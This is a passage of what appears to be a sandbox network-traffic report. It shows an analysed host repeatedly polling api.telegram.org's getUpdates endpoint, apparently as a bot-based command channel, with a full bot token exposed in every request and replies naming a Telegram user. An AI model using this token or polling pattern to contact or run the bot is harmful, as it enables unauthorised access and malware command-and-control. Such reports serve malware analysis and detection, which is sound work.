                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        42192.168.2.449803149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:33 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:33 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:33 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:33 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        43192.168.2.449804149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:34 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:34 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:34 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:34 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        44192.168.2.449805149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:35 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:35 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:35 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:35 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        45192.168.2.449806149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:36 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:36 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:36 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:36 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        46192.168.2.449807149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:37 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:37 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:37 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:37 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        47192.168.2.449808149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:38 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:38 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:38 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:38 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        48192.168.2.449809149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:39 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:39 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:39 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:39 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        49192.168.2.449810149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:40 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:40 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:40 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:40 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        50192.168.2.449811149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:41 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:41 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:41 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:41 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        51192.168.2.449812149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:42 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:42 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:42 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:42 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        52192.168.2.449813149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:43 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:44 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:43 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:44 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        53192.168.2.449814149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:44 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:44 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:44 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:44 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        54192.168.2.449815149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:45 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:46 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:46 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
